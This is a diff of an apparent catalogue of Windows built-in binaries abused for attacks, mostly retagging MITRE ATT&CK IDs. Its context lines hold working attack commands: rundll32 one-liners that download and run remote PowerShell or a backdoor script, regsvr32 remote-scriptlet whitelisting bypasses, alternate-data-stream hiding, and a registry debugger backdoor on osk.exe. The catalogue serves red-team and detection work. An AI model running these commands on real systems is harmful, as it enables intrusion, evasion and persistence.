|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\pcalua.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\pcwrun.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Reconnaissance | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1040 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1040 | ||||
|     OperatingSystem: Windows 10 1809 and later | ||||
|   - Command: pktmon.exe filter add -p 445 | ||||
|     Description: Select Desired ports for packet capture | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Reconnaissance | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1040 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1040 | ||||
|     OperatingSystem: Windows 10 1809 and later | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\pktmon.exe | ||||
|   | ||||
| @@ -1,23 +1,22 @@ | ||||
| --- | ||||
| Name: Pnputil.exe | ||||
| Description: used for Install drivers. | ||||
| Description: Used for installing drivers | ||||
| Author: Hai vaknin (lux) | ||||
| Created: 25/12/2020 | ||||
| Created: 2020-12-25 | ||||
| Commands: | ||||
|   - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf | ||||
|     Description: used for Install drivers | ||||
|     Usecase: add malicious driver. | ||||
|     Description: Used for installing drivers | ||||
|     Usecase: Aadd malicious driver | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1215 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1215 | ||||
|     OperatingSystem: Windows 10,7  | ||||
|     MitreID: T1547.006 | ||||
|     OperatingSystem: Windows 10,7 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\system32\pnputil.exe | ||||
| Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf | ||||
| Acknowledgement: | ||||
|   - Person: Hai Vaknin(Lux)  | ||||
|     Handle: 'LuxNoBulIshit' | ||||
|   - Person: Hai Vaknin(Lux) | ||||
|     Handle: '@LuxNoBulIshit' | ||||
|   - Person: Avihay eldad | ||||
|     Handle: 'aloneliassaf' | ||||
|     Handle: '@aloneliassaf' | ||||
| --- | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Presentationhost.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe | ||||
|     Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe | ||||
|     Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\print.exe | ||||
|   | ||||
| @@ -10,15 +10,13 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105/ | ||||
|     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder | ||||
|     Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder | ||||
|     Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1096/ | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\spool\tools\PrintBrm.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Reconnaissance | ||||
|     Privileges: User | ||||
|     MitreID: T1113 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1113/ | ||||
|     OperatingSystem: since Windows 7 (client) / Windows 2008 R2 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\psr.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User, Administrator in Windows 8 | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\rasautou.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Hide/plant registry information in Alternate data stream for later use | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\reg.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Execute code and bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: Local Admin | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     MitreID: T1218.009 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regasm.exe /U AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the UnRegisterClass function. | ||||
|     Usecase: Execute code and bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     MitreID: T1218.009 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe | ||||
| @@ -32,7 +30,7 @@ Detection: | ||||
| Resources: | ||||
|   - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Hide registry data in alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regedit C:\ads\file.txt:regfile.reg | ||||
|     Description: Import the target .REG file into the Registry. | ||||
|     Usecase: Import hidden registry data from alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\regedit.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Write to registry | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\regini.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Register-cimprovider.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Execute dll file and bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: Local Admin | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     MitreID: T1218.009 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvcs.exe AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute dll file and bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: Local Admin | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     MitreID: T1218.009 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\regsvcs.exe | ||||
| @@ -30,7 +28,7 @@ Detection: | ||||
| Resources: | ||||
|   - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
|   | ||||
| @@ -9,32 +9,28 @@ Commands: | ||||
|     Usecase: Execute code from remote scriptlet, bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     MitreID: T1218.010 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll | ||||
|     Description: Execute the specified local .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from scriptlet, bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     MitreID: T1218.010 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
|     Description: Execute the specified remote .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from remote scriptlet, bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     MitreID: T1218.010 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll | ||||
|     Description: Execute the specified local .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from scriptlet, bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     MitreID: T1218.010 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\regsvr32.exe | ||||
| @@ -47,7 +43,7 @@ Detection: | ||||
| Resources: | ||||
|   - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A | ||||
|     Description: Download/Copy bar.exe to outdir | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\replace.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Credentials | ||||
|     Privileges: User | ||||
|     MitreID: T1003 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM | ||||
|     Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set). | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Credentials | ||||
|     Privileges: User | ||||
|     MitreID: T1187 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1187/ | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\rpcping.exe | ||||
|   | ||||
| @@ -9,64 +9,56 @@ Commands: | ||||
|     Usecase: Execute dll file | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint | ||||
|     Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. | ||||
|     Usecase: Execute DLL from SMB share. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. | ||||
|     Usecase: Execute code from Internet | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. | ||||
|     Usecase: Proxy execution | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. | ||||
|     Usecase: Proxy execution | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. | ||||
|     Usecase: Execute code from Internet | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain | ||||
|     Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). | ||||
|     Usecase: Execute code from alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe -sta {CLSID} | ||||
|     Description: Use Rundll32.exe to load a registered or hijacked COM Server payload.  Also works with ProgID. | ||||
|     Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: | ||||
|     MitreLink: | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows 10 (and likely previous versions) | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\rundll32.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\runonce.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Execute binary file hidden inside an alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\sc.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1053 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1053 | ||||
|     OperatingSystem: Windows | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\schtasks.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" | ||||
|     Description: Executes calc.cmde from remote server | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\scriptrunner.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218/ | ||||
|     OperatingSystem: Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything | ||||
|     Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218/ | ||||
|     OperatingSystem: Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\SettingSyncHost.exe | ||||
|   | ||||
| @@ -10,12 +10,11 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\stordiag.exe | ||||
|   - Path: c:\windows\syswow64\stordiag.exe | ||||
| Detection:  | ||||
| Detection: | ||||
|   - IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\ | ||||
| Resources: | ||||
|   - Link: https://twitter.com/eral4m/status/1451112385041911809 | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\SyncAppvPublishingServer.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 2004 | ||||
|   - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" | ||||
|     Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 1909 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\ttdinject.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 1809 and newer | ||||
|   - Command: TTTracer.exe -dumpFull -attach pid | ||||
|     Description: Dumps process using tttracer.exe. Requires administrator privileges | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Dump | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1003 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1003 | ||||
|     OperatingSystem: Windows 10 1809 and newer | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\tttracer.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1127/ | ||||
|     OperatingSystem: Windows 10,7 | ||||
|   - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb | ||||
|     Description: Description of the second command | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1127/ | ||||
|     OperatingSystem: Windows 10,7 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\verclsid.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Program Files\Windows Mail\wab.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process call create calc | ||||
|     Description: Execute calc from wmic | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" | ||||
|     Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" | ||||
|     Description: Execute evil.exe on the remote system. | ||||
| @@ -34,7 +31,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
